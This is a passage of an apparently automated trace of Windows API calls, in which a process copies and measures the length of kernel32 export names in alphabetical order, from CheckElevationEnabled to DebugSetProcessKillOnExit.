[0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.021] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.021] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.021] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.021] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.021] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.021] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.021] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.021] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.021] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.021] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.021] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.022] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.022] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.022] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.022] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.022] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.022] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.022] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.022] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.022] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.022] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.022] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.022] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.022] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.022] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.022] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.023] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.023] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.023] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.023] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.023] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.023] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.023] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.023] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.023] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.023] lstrlenA (lpString="COPYFILEA") returned 9 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.023] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.023] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.023] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.023] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.023] lstrlenA (lpString="COPYFILEW") returned 9 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.023] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.023] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.023] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.023] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.024] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.024] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.024] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.024] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.024] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.024] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.024] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.024] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.024] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.024] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.024] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.024] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.024] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.024] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.024] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.024] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.024] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.024] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.024] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.025] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.025] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.025] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.025] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.025] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.025] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.025] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.025] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.025] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.025] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.025] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.025] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.025] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.025] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.025] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.025] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.025] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.025] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.026] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.026] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.026] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.026] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.026] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.026] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.026] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.026] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.026] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.026] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.026] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.026] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.026] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.026] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.026] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.026] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.026] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.026] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.026] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.026] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.027] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.027] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.027] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.027] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.027] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.027] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.027] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.027] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.027] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.027] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.027] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.027] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.027] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.027] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.027] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.027] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.027] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.027] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.027] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.027] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.028] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.028] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.028] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.028] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.028] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.028] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: 